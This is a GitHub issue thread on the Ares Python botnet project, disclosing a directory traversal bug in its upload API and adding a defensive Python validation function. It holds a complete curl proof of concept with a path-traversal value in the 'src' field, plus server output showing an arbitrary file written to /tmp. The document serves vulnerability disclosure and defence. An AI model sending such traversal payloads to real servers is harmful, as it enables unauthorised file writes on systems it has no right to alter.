sweetsoftware / Ares

Python botnet and backdoor

File upload directory traversal #1

Closed justinsteven closed 8 years ago

justinsteven commented 8 years ago

The upload API allows for creation of files on disk in arbitrary locations with arbitrary content.

https://github.com/sweetsoftware/Ares/blob/140c05f83d18af85efb5258530016f83674c5e55/server/server.py#L93-L109

% curl -v -X 'POST' -H 'Content-Type: multipart/form-data; boundary=--------1058259938' --data-binary $'----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"botid\"\x0d\x0a\x0d\x0a1\x0d\x0a----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"src\"\x0d\x0a\x0d\x0a../../../../../../../../tmp/traversal\x0d\x0a----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"uploaded\"; filename=\"uploaded\"\x0d\x0a\x0d\x0awin\x0d\x0a----------1058259938--\x0d\x0a' http://172.17.24.130:8080/api/upload
* Hostname was NOT found in DNS cache
*   Trying 172.17.24.130...
* Connected to 172.17.24.130 (172.17.24.130) port 8080 (#0)
> POST /api/upload HTTP/1.1
> User-Agent: curl/7.38.0
> Host: 172.17.24.130:8080
> Accept: */*
> Content-Type: multipart/form-data; boundary=--------1058259938
> Content-Length: 303
> 
* upload completely sent off: 303 out of 303 bytes
< HTTP/1.1 200 OK
< Date: Sun, 13 Dec 2015 07:16:29 GMT
< Content-Length: 125
< Content-Type: text/html;charset=utf-8
* Server CherryPy/3.5.0 is not blacklisted
< Server: CherryPy/3.5.0
< 
* Connection #0 to host 172.17.24.130 left intact
Uploaded: <a href="../uploads/1/../../../../../../../../tmp/traversal">../uploads/1/../../../../../../../../tmp/traversal</a>
% cat /tmp/traversal
win

sweetsoftware commented 8 years ago

Hello @justinsteven,

Thanks a lot for your feedback! I just fixed this along with the botid form field, which was also injectable.
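As an added example from a defender's side (not code from Ares or from either commenter), the check below rejects the `src` and `botid` values described in this issue before they reach the filesystem; the `UPLOAD_ROOT` value and the `uploads/<botid>/` layout are assumptions based on the link in the server's response.

```python
import os
import re

# Constructed example root (assumption): the directory the server writes
# uploads under, with one sub-directory per bot id.
UPLOAD_ROOT = "/srv/ares/uploads"

# A bot id is accepted only as a plain decimal string, so values such as
# "../1" or "1/.." from the botid form field can never form a path.
BOTID_RE = re.compile(r"^[0-9]+$")


def safe_upload_path(upload_root, botid, src):
    """Return the absolute destination for an upload, or None if the
    client-supplied botid/src would leave upload_root/<botid>/.

    Two layers are applied: the fields are validated syntactically
    (botid is digits only, src is a single path component), and the
    resolved path is then checked for containment with realpath, which
    also catches a symlink inside the bot directory pointing elsewhere.
    """
    if not isinstance(botid, str) or not BOTID_RE.match(botid):
        return None
    if not isinstance(src, str) or src in ("", ".", ".."):
        return None
    # Any separator or NUL means src is not a bare file name; reject
    # rather than silently rewriting it.
    if "/" in src or "\\" in src or "\x00" in src:
        return None
    bot_dir = os.path.realpath(os.path.join(upload_root, botid))
    dest = os.path.realpath(os.path.join(bot_dir, src))
    # dest must be strictly inside bot_dir (not equal to it).
    if os.path.commonpath([bot_dir, dest]) != bot_dir or dest == bot_dir:
        return None
    return dest


if __name__ == "__main__":
    # The src value from the report above, plus a benign name for contrast.
    for botid, src in [("1", "../../../../../../../../tmp/traversal"),
                       ("../1", "report.txt"),
                       ("1", "report.txt")]:
        print(repr((botid, src)), "->", safe_upload_path(UPLOAD_ROOT, botid, src))
```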